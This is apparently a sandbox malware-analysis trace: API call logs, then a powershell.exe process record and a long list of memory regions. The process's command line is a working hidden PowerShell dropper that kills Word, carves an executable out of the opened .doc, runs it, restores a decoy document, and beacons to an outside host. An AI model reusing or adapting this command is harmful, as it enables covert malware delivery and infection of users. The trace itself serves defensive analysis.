[0067.683] GetCurrentThreadId () returned 0x7d8
Thread:
id = 83
os_tid = 0x9ec
[0067.711] GetCurrentThreadId () returned 0x9ec
Thread:
id = 84
os_tid = 0x96c
[0067.753] GetCurrentThreadId () returned 0x96c
Thread:
id = 85
os_tid = 0x970
[0067.772] GetCurrentThreadId () returned 0x970
Thread:
id = 86
os_tid = 0x974
[0067.901] GetCurrentThreadId () returned 0x974
[0067.901] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x7fee0880000
[0067.901] CoInitialize (pvReserved=0x0) returned 0x0
[0067.901] GetTickCount () returned 0x20398
[0067.901] IInternetProtocol:Read (in: This=0x2ba240, pv=0x2e5418, cb=0xf38, pcbRead=0x343fbd0 | out: pv=0x2e5418, pcbRead=0x343fbd0*=0xc29) returned 0x0
[0067.902] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2e5350, cbMultiByte=3313, lpWideCharStr=0x2e6368, cchWideChar=3313 | out: lpWideCharStr="") returned 3313
[0067.902] IUnknown:AddRef (This=0x27e180) returned 0x11
[0067.902] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x343f9d0 | out: lpCPInfo=0x343f9d0) returned 1
[0067.902] IUnknown:AddRef (This=0x294ce0) returned 0x4
[0067.902] IUnknown:AddRef (This=0x27e180) returned 0x12
[0067.902] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x343fa10 | out: ppvObject=0x343fa10*=0x27e180) returned 0x0
[0067.902] IUnknown:Release (This=0x27e180) returned 0x12
[0067.902] IUnknown:AddRef (This=0x27e180) returned 0x13
[0067.903] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x343fa40 | out: pdwScheme=0x343fa40*=0x2) returned 0x0
[0067.903] IUnknown:Release (This=0x27e180) returned 0x12
[0067.903] PostMessageW (hWnd=0x1021c, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0067.913] GetTickCount () returned 0x203a8
[0067.913] IInternetProtocol:Read (in: This=0x2ba240, pv=0x2f660c, cb=0x1000, pcbRead=0x343fb90 | out: pv=0x2f660c, pcbRead=0x343fb90*=0x0) returned 0x1
[0067.914] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x927c0) returned 0x0
[0067.914] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x927c0) returned 0x0
[0083.801] GetTickCount () returned 0x240e6
[0083.802] IInternetProtocolRoot:Terminate (This=0x2ba240, dwOptions=0x0) returned 0x0
[0083.802] IUnknown:Release (This=0x2b9fa8) returned 0x8
[0083.802] IUnknown:Release (This=0x2b9fa8) returned 0x7
[0083.802] IUnknown:Release (This=0x2b9fb0) returned 0x6
[0083.802] IUnknown:Release (This=0x2b9fa0) returned 0x5
[0083.802] IUnknown:Release (This=0x2ba020) returned 0x4
[0083.802] IUnknown:Release (This=0x2ba020) returned 0x3
[0083.802] GetCurrentThreadId () returned 0x974
[0083.802] GetTickCount () returned 0x240e6
[0083.802] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0x927c0) returned 0x0
[0084.642] CoUninitialize ()
[0084.642] FreeLibraryAndExitThread (hLibModule=0x7fee0880000, dwExitCode=0x0)
[0084.642] GetCurrentThreadId () returned 0x974
Thread:
id = 87
os_tid = 0x990
[0068.026] GetCurrentThreadId () returned 0x990
Thread:
id = 88
os_tid = 0x984
[0068.137] GetCurrentThreadId () returned 0x984
[0068.176] GetCurrentThreadId () returned 0x984
Thread:
id = 92
os_tid = 0x73c
[0068.382] GetCurrentThreadId () returned 0x73c
Process:
id = "8"
image_name = "powershell.exe"
filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
page_root = "0x3a76e000"
os_pid = "0x664"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "5"
os_parent_pid = "0xbc8"
cmd_line = "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1303
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1304
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1305
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1306
start_va = 0x90000
end_va = 0x10ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1307
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1308
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1309
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1310
start_va = 0x13f630000
end_va = 0x13f6a6fff
entry_point = 0x13f630000
region_type = mapped_file
name = "powershell.exe"
filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")
Region:
id = 1311
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1312
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1313
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1314
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1405
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1406
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1407
start_va = 0x50000
end_va = 0x56fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1408
start_va = 0x60000
end_va = 0x61fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1409
start_va = 0x70000
end_va = 0x72fff
entry_point = 0x70000
region_type = mapped_file
name = "powershell.exe.mui"
filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")
Region:
id = 1410
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 1411
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1412
start_va = 0x150000
end_va = 0x24ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1413
start_va = 0x250000
end_va = 0x2b6fff
entry_point = 0x250000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1414
start_va = 0x2c0000
end_va = 0x3bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1415
start_va = 0x490000
end_va = 0x49ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1416
start_va = 0x4a0000
end_va = 0x627fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 1417
start_va = 0x630000
end_va = 0x7b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 1418
start_va = 0x7c0000
end_va = 0x1bbffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007c0000"
filename = ""
Region:
id = 1419
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1420
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1421
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1422
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1423
start_va = 0x7fef1910000
end_va = 0x7fef197efff
entry_point = 0x7fef1911134
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 1424
start_va = 0x7fefbf10000
end_va = 0x7fefbf28fff
entry_point = 0x7fefbf111a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1425
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1426
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1427
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1428
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1429
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1430
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1431
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1432
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1433
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1434
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1435
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1436
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1437
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1453
start_va = 0x3f0000
end_va = 0x3fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1454
start_va = 0x1bc0000
end_va = 0x1cbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001bc0000"
filename = ""
Region:
id = 1455
start_va = 0x1d00000
end_va = 0x1d7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1456
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1475
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1476
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 1477
start_va = 0x1d80000
end_va = 0x1e5efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d80000"
filename = ""
Region:
id = 1478
start_va = 0x1ed0000
end_va = 0x1f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ed0000"
filename = ""
Region:
id = 1479
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1480
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1481
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1482
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1483
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1484
start_va = 0x140000
end_va = 0x141fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 1485
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1496
start_va = 0x3c0000
end_va = 0x3c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1497
start_va = 0x3d0000
end_va = 0x3d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1498
start_va = 0x1f50000
end_va = 0x221efff
entry_point = 0x1f50000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1499
start_va = 0x2300000
end_va = 0x237ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1500
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1501
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1502
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1503
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1504
start_va = 0x2380000
end_va = 0x2772fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002380000"
filename = ""
Region:
id = 1505
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1506
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1507
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1508
start_va = 0x400000
end_va = 0x41efff
entry_point = 0x400000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 1509
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 1510
start_va = 0x2260000
end_va = 0x22dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002260000"
filename = ""
Region:
id = 1511
start_va = 0x7fef61a0000
end_va = 0x7fef61d3fff
entry_point = 0x7fef61a0000
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")
Region:
id = 1512
start_va = 0x7fef91c0000
end_va = 0x7fef9216fff
entry_point = 0x7fef91c1118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1513
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1526
start_va = 0x7fef6190000
end_va = 0x7fef619bfff
entry_point = 0x7fef6190000
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 1560
start_va = 0x3e0000
end_va = 0x3e3fff
entry_point = 0x3e0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1561
start_va = 0x430000
end_va = 0x45ffff
entry_point = 0x430000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 1562
start_va = 0x460000
end_va = 0x463fff
entry_point = 0x460000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1563
start_va = 0x1e60000
end_va = 0x1ec5fff
entry_point = 0x1e60000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1564
start_va = 0x7fef7b70000
end_va = 0x7fef7beffff
entry_point = 0x7fef7b74a8c
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 1569
start_va = 0x2920000
end_va = 0x299ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 1570
start_va = 0x7fef7bf0000
end_va = 0x7fef7bfefff
entry_point = 0x7fef7bf1040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1571
start_va = 0x7fefbee0000
end_va = 0x7fefbeeafff
entry_point = 0x7fefbee4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1572
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
entry_point = 0x7fefd541198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1573
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1574
start_va = 0x7fef13f0000
end_va = 0x7fef1488fff
entry_point = 0x7fef13f2670
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 1575
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1576
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1577
start_va = 0x470000
end_va = 0x470fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 1578
start_va = 0x27e0000
end_va = 0x285ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 1579
start_va = 0x29a0000
end_va = 0x2a9ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 1580
start_va = 0x2b20000
end_va = 0x2b2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b20000"
filename = ""
Region:
id = 1581
start_va = 0x75360000
end_va = 0x75428fff
entry_point = 0x75362df0
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll")
Region:
id = 1582
start_va = 0x7fee38d0000
end_va = 0x7fee426cfff
entry_point = 0x7fee3d1a300
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")
Region:
id = 1583
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1605
start_va = 0x480000
end_va = 0x482fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1606
start_va = 0x1cc0000
end_va = 0x1cc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cc0000"
filename = ""
Region:
id = 1607
start_va = 0x1ce0000
end_va = 0x1cfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ce0000"
filename = ""
Region:
id = 1608
start_va = 0x2880000
end_va = 0x28fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 1609
start_va = 0x2b70000
end_va = 0x2beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b70000"
filename = ""
Region:
id = 1610
start_va = 0x2bf0000
end_va = 0x1abeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bf0000"
filename = ""
Region:
id = 1611
start_va = 0x1abf0000
end_va = 0x1b2bffff
entry_point = 0x0
region_type = private
name = "private_0x000000001abf0000"
filename = ""
Region:
id = 1612
start_va = 0x1b2c0000
end_va = 0x1b3c0fff
entry_point = 0x0
region_type = private
name = "private_0x000000001b2c0000"
filename = ""
Region:
id = 1613
start_va = 0x7fee29f0000
end_va = 0x7fee38cbfff
entry_point = 0x7fee29f0000
region_type = mapped_file
name = "mscorlib.ni.dll"
